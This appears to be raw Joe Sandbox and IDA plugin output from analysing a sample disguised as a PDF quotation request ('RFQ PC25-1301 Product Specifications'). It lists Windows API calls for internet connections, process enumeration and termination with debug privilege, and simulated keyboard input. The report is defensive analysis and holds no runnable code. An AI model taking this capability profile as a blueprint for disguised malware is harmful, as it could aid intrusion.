                                                                                                                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3210457359-0
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A96890
                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A968A9
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A968B9
                                                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A968D1
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A968F2
                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A58874,00000000,00000000,00000000,000000FF,00000000), ref: 00A96901
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A9691E
                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A58874,00000000,00000000,00000000,000000FF,00000000), ref: 00A9692D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268354404-0
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ABC182
                                                                                                                • GetLastError.KERNEL32 ref: 00ABC195
                                                                                                                • SetEvent.KERNEL32(?), ref: 00ABC1A9
                                                                                                                  • Part of subcall function 00ABC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ABC272
                                                                                                                  • Part of subcall function 00ABC253: GetLastError.KERNEL32 ref: 00ABC322
                                                                                                                  • Part of subcall function 00ABC253: SetEvent.KERNEL32(?), ref: 00ABC336
                                                                                                                  • Part of subcall function 00ABC253: InternetCloseHandle.WININET(00000000), ref: 00ABC341
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 337547030-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA3A57
                                                                                                                  • Part of subcall function 00AA3A3D: GetCurrentThreadId.KERNEL32 ref: 00AA3A5E
                                                                                                                  • Part of subcall function 00AA3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AA25B3), ref: 00AA3A65
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AA25BD
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AA25DB
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00AA25DF
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AA25E9
                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AA2601
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00AA2605
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AA260F
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AA2623
                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00AA2627
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00AA1449,?,?,00000000), ref: 00AA180C
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00AA1449,?,?,00000000), ref: 00AA1813
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AA1449,?,?,00000000), ref: 00AA1828
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00AA1449,?,?,00000000), ref: 00AA1830
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00AA1449,?,?,00000000), ref: 00AA1833
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AA1449,?,?,00000000), ref: 00AA1843
                                                                                                                • GetCurrentProcess.KERNEL32(00AA1449,00000000,?,00AA1449,?,?,00000000), ref: 00AA184B
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00AA1449,?,?,00000000), ref: 00AA184E
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00AA1874,00000000,00000000,00000000), ref: 00AA1868
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1957940570-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AAD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00AAD501
                                                                                                                  • Part of subcall function 00AAD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00AAD50F
                                                                                                                  • Part of subcall function 00AAD4DC: CloseHandle.KERNEL32(00000000), ref: 00AAD5DC
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ACA16D
                                                                                                                • GetLastError.KERNEL32 ref: 00ACA180
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ACA1B3
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00ACA268
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00ACA273
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACA2C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AD3925
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AD393A
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AD3954
                                                                                                                • _wcslen.LIBCMT ref: 00AD3999
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AD39C6
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AD39F4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcslen
                                                                                                                • String ID: SysListView32
                                                                                                                • API String ID: 2147712094-78025650
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AABCFD
                                                                                                                • IsMenu.USER32(00000000), ref: 00AABD1D
                                                                                                                • CreatePopupMenu.USER32 ref: 00AABD53
                                                                                                                • GetMenuItemCount.USER32(01165760), ref: 00AABDA4
                                                                                                                • InsertMenuItemW.USER32(01165760,?,00000001,00000030), ref: 00AABDCC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                • String ID: 0$2
                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 00AAC913
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 952045576-0
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A9682C,00000004,00000000,00000000), ref: 00A5F953
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A9682C,00000004,00000000,00000000), ref: 00A9F3D1
                                                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A9682C,00000004,00000000,00000000), ref: 00A9F454
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AD2D1B
                                                                                                                • GetDC.USER32(00000000), ref: 00AD2D23
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AD2D2E
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00AD2D3A
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AD2D76
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AD2D87
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AD5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00AD2DC2
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AD2DE1
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 0-572801152
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A815CE
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A81651
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A817FB,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A816E4
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A816FB
                                                                                                                  • Part of subcall function 00A73820: RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00A81777
                                                                                                                • __freea.LIBCMT ref: 00A817A2
                                                                                                                • __freea.LIBCMT ref: 00A817AE
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 2829977744-0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit
                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                • API String ID: 2610073882-625585964
                                                                                                                APIs
                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00AB125C
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AB1284
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00AB12A8
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AB12D8
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AB135F
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AB13C4
                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AB1430
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 2550207440-0
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AC396B
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AC3A7A
                                                                                                                • _wcslen.LIBCMT ref: 00AC3A8A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AC3C1F
                                                                                                                  • Part of subcall function 00AB0CDF: VariantInit.OLEAUT32(00000000), ref: 00AB0D1F
                                                                                                                  • Part of subcall function 00AB0CDF: VariantCopy.OLEAUT32(?,?), ref: 00AB0D28
                                                                                                                  • Part of subcall function 00AB0CDF: VariantClear.OLEAUT32(?), ref: 00AB0D34
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4137639002-1221869570
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?,?,00AA035E), ref: 00AA002B
                                                                                                                  • Part of subcall function 00AA000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0046
                                                                                                                  • Part of subcall function 00AA000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0054
                                                                                                                  • Part of subcall function 00AA000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?), ref: 00AA0064
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00AC4C51
                                                                                                                • _wcslen.LIBCMT ref: 00AC4D59
                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00AC4DCF
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00AC4DDA
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                • API String ID: 614568839-2785691316
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(?), ref: 00AD2183
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00AD21B5
                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AD21DD
                                                                                                                • _wcslen.LIBCMT ref: 00AD2213
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00AD224D
                                                                                                                • GetSubMenu.USER32(?,?), ref: 00AD225B
                                                                                                                  • Part of subcall function 00AA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AA3A57
                                                                                                                  • Part of subcall function 00AA3A3D: GetCurrentThreadId.KERNEL32 ref: 00AA3A5E
                                                                                                                  • Part of subcall function 00AA3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AA25B3), ref: 00AA3A65
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AD22E3
                                                                                                                  • Part of subcall function 00AAE97B: Sleep.KERNEL32 ref: 00AAE9F3
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4196846111-0
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(01165940), ref: 00AD7F37
                                                                                                                • IsWindowEnabled.USER32(01165940), ref: 00AD7F43
                                                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00AD801E
                                                                                                                • SendMessageW.USER32(01165940,000000B0,?,?), ref: 00AD8051
                                                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 00AD8089
                                                                                                                • GetWindowLongW.USER32(01165940,000000EC), ref: 00AD80AB
                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AD80C3
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 4072528602-0
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00AAAEF9
                                                                                                                • GetKeyboardState.USER32(?), ref: 00AAAF0E
                                                                                                                • SetKeyboardState.USER32(?), ref: 00AAAF6F
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AAAF9D
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AAAFBC
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AAAFFD
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AAB020
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000000), ref: 00AAAD19
                                                                                                                • GetKeyboardState.USER32(?), ref: 00AAAD2E
                                                                                                                • SetKeyboardState.USER32(?), ref: 00AAAD8F
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AAADBB
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AAADD8
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AAAE17
                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AAAE38
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                APIs
                                                                                                                • GetConsoleCP.KERNEL32(00A83CD6,?,?,?,?,?,?,?,?,00A75BA3,?,?,00A83CD6,?,?), ref: 00A75470
                                                                                                                • __fassign.LIBCMT ref: 00A754EB
                                                                                                                • __fassign.LIBCMT ref: 00A75506
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00A83CD6,00000005,00000000,00000000), ref: 00A7552C
                                                                                                                • WriteFile.KERNEL32(?,00A83CD6,00000000,00A75BA3,00000000,?,?,?,?,?,?,?,?,?,00A75BA3,?), ref: 00A7554B
                                                                                                                • WriteFile.KERNEL32(?,?,00000001,00A75BA3,00000000,?,?,?,?,?,?,?,?,?,00A75BA3,?), ref: 00A75584
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1324828854-0
                                                                                                                APIs
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A62D4B
                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00A62D53
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A62DE1
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00A62E0C
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00A62E61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
